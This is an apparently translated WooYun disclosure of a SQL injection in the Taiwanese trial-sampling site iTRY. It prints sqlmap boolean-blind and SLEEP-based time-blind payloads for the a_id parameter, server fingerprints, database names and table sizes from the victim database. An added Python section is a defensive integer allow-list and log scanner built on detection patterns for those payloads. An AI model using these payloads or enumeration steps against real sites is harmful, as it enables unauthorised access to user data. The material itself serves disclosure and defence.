
Vulnerability summary (followers: 24)

Defect ID: wooyun-2016-0167990

Title: iTRY試用情報王 SQL injection / multiple databases / over a million records (Taiwan region)

Vendor: iTRY試用情報王

Author: 路人甲

Submitted: 2016-01-07 14:48

Fix time: 2016-02-20 15:48

Public disclosure time: 2016-02-20 15:48

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: handed over to a third-party partner organisation (HITCON Taiwan vulnerability reporting platform) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2016-01-07: details sent to the vendor, awaiting vendor handling
2016-01-08: vendor confirmed; details visible to the vendor only
2016-01-18: details disclosed to core white hats and domain experts
2016-01-28: details disclosed to regular white hats
2016-02-07: details disclosed to intern white hats
2016-02-20: details disclosed to the public

Brief description:

Detailed description:

iTRY試用情報王 promotes the spirit of "iTRY Before I Buy!": it helps vendors send out trial products precisely and lets consumers request trials themselves. It is Taiwan's first and largest trial-product distribution platform and has been widely praised in major media reports.
Target site: http://**.**.**.**/
Injection point: http://**.**.**.**/index.php?func=appraise&action=detail&a_id=19
It is best to add --random-agent

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: a_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: func=appraise&action=detail&a_id=19 AND 8422=8422
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: func=appraise&action=detail&a_id=19 AND (SELECT * FROM (SELECT(SLEEP(5)))jNqk)
---
web server operating system: Linux CentOS 5.10
web application technology: PHP 5.3.3, Apache 2.2.3
back-end DBMS: MySQL 5.0.12
current database: 'itry_db'
current user is DBA: False
available databases [7]:
[*] dev_itry_db
[*] dev_itry_phpbb
[*] dev_iwantgroup
[*] information_schema
[*] itry
[*] itry_db
[*] test
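The sqlmap output above shows the two blind-injection styles that the numeric a_id parameter accepted: a boolean tautology appended to the value and a SLEEP()-based time delay. The following Python script is an added example, not part of the report or of the vendor's code. It does two defender-side things: it defines the strict integer allow-list that a record id such as a_id should pass before it is ever placed in a query (the check whose absence makes the concatenated query injectable), and it runs that check over Apache-style access-log lines so that requests carrying either payload shape surface as findings. The log lines, the client addresses (TEST-NET documentation ranges) and all function names are constructed for this example; the query strings mirror the payload shapes reported above.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Apache combined-log-style lines (not taken from the report).
# The a_id values mirror the two payload shapes sqlmap reported for this
# parameter: a boolean tautology and a SLEEP()-based time delay.
SAMPLE_LOG = """\
203.0.113.10 - - [07/Jan/2016:14:48:01 +0800] "GET /index.php?func=appraise&action=detail&a_id=19 HTTP/1.1" 200 5120
203.0.113.10 - - [07/Jan/2016:14:48:02 +0800] "GET /index.php?func=appraise&action=detail&a_id=19%20AND%208422%3D8422 HTTP/1.1" 200 5120
203.0.113.10 - - [07/Jan/2016:14:48:03 +0800] "GET /index.php?func=appraise&action=detail&a_id=19%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29jNqk%29 HTTP/1.1" 200 5120
198.51.100.7 - - [07/Jan/2016:14:49:00 +0800] "GET /index.php?func=appraise&action=detail&a_id=abc HTTP/1.1" 200 5120
"""

# Minimal access-log line parser: client IP, timestamp and request target.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# What a record id such as a_id is allowed to look like server-side:
# a plain decimal integer and nothing else.
NUMERIC_ID_RE = re.compile(r"^[0-9]{1,10}$")

# Signatures of the two blind-injection styles visible in the sqlmap output.
BOOLEAN_BLIND_RE = re.compile(r"\b(?:AND|OR)\b\s+\d+\s*=\s*\d+", re.I)
TIME_BLIND_RE = re.compile(r"\b(?:SLEEP|BENCHMARK)\s*\(", re.I)


def is_valid_id(value: str) -> bool:
    """Strict allow-list check a numeric id parameter should pass before it
    reaches a query; the hardened alternative to concatenating raw input."""
    return NUMERIC_ID_RE.match(value) is not None


def classify(value: str) -> str:
    """Label a rejected id value by the injection style it resembles."""
    if TIME_BLIND_RE.search(value):
        return "time-blind"
    if BOOLEAN_BLIND_RE.search(value):
        return "boolean-blind"
    return "malformed"


def scan_log(text: str, param: str = "a_id") -> list:
    """Return one finding per request whose `param` value fails the integer
    allow-list, with the client IP, timestamp, decoded value and verdict."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line we understand; skip it
        query = urlsplit(m.group("target")).query
        # parse_qs percent-decodes each value, so the signatures above are
        # matched against the text the application itself would have seen.
        for value in parse_qs(query, keep_blank_values=True).get(param, []):
            if is_valid_id(value):
                continue
            findings.append({
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                "value": value,
                "verdict": classify(value),
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']} {f['ts']} {f['verdict']:14} {f['value']!r}")
```

Run against the constructed sample, the first request passes the allow-list and the other three are reported as boolean-blind, time-blind and malformed respectively. The same allow-list, applied in the application before the value is bound into the query (ideally combined with a prepared statement rather than string concatenation), is what removes the injection rather than merely detecting it.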


Table data:

Database: itry_db
+-------------------------------+---------+
| Table | Entries |
+-------------------------------+---------+
| schedule_batch_fire_count | 1410935 |
| schedule_mark | 1201028 |
| survey_answer | 548487 |
| schedule_winner | 333893 |
| epaper | 125233 |
| products_spec_item | 32236 |
| survey_process_log | 32212 |
| survey_process | 29252 |
| schedule_blacklist | 24086 |
| questionnaire_answer | 23519 |
| schedule_report | 19441 |
| customer_service_sub | 12928 |
| question_skin_type | 12713 |
| customer_service_main | 11358 |
| schedule_winner_report_plain | 5123 |
| forward_mem | 3809 |
| schedule_winner_report | 3721 |
| schedule_batch | 3644 |
| consuming | 3238 |
| fbattend | 3086 |
| schedule_products_join | 2499 |
| schedule_participate_list | 2417 |
| schedule | 2334 |
| schedule_products | 2333 |
| appraise_answer | 1937 |
| products | 1889 |
| products_spec | 1889 |
| announce_member | 1876 |
| products_brand | 1854 |
| schedule_batch_fire_filter | 1686 |
| announce | 1661 |
| products_detail_item | 1587 |
| announce_member_status | 1253 |
| questionnaire_item | 926 |
| family | 897 |
| schedule_shock_get | 779 |
| sessions | 743 |
| appraise_products_spec | 687 |
| factory_contact | 613 |
| drawing_distribution | 576 |
| brand | 487 |
| brand_factory | 439 |
| factory | 413 |
| products_class | 366 |
| criticize_class | 363 |
| contact | 354 |
| survey_image_text | 296 |
| schedule_products_spec | 237 |
| schedule_register_filter | 215 |
| forward | 196 |
| questionnaire_topic | 182 |
| schedule_winner_report_date | 167 |
| products_select_item | 99 |
| counter | 92 |
| family_history | 84 |
| holiday | 81 |
| schedule_shock | 62 |
| products_detail | 36 |
| forum_article_1 | 35 |
| account_marker | 28 |
| schedule_drawing_filter | 28 |
| consuming_ref_url | 27 |
| schedule_project | 24 |
| appraise | 22 |
| appraise_share | 19 |
| route_entity_item | 18 |
| contact_products | 16 |
| questionnaire | 15 |
| question_class | 14 |
| `user` | 13 |
| appraise_class | 13 |
| brand_class | 13 |
| drawing_distribution_item | 13 |
| example_content | 13 |
| fbactive | 13 |
| postage_outside | 13 |
| schedule_class | 13 |
| tryout_commodity | 12 |
| writing_quality | 11 |
| customer_service_class | 10 |
| customer_service_question | 10 |
| identitys | 8 |
| pointbook_class | 8 |
| products_select | 8 |
| project | 7 |
| user_group | 7 |
| consuming_class | 6 |
| schedule_register_filter_list | 6 |
| products_route_entity | 5 |
| route_entity | 5 |
| route_network | 4 |
| user_log | 4 |
| event_trigger | 3 |
| helper_user | 3 |
| pointbook_from_2011 | 3 |
| project_products | 3 |
| event_receiver | 2 |
| sign_class | 2 |
| forum_cron | 1 |
| forum_name | 1 |
| forum_site | 1 |
| helper_user_group | 1 |
| pointbook_amount | 1 |
| pointbook_company_class | 1 |
| products_route_network | 1 |
| sign | 1 |
+-------------------------------+---------+

Proof of vulnerability:

Fix recommendation:

Copyright notice: when reposting, credit the source 路人甲@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 16

Confirmed: 2016-01-08 13:37

Vendor reply:

Thanks for the report

Latest status:

None yet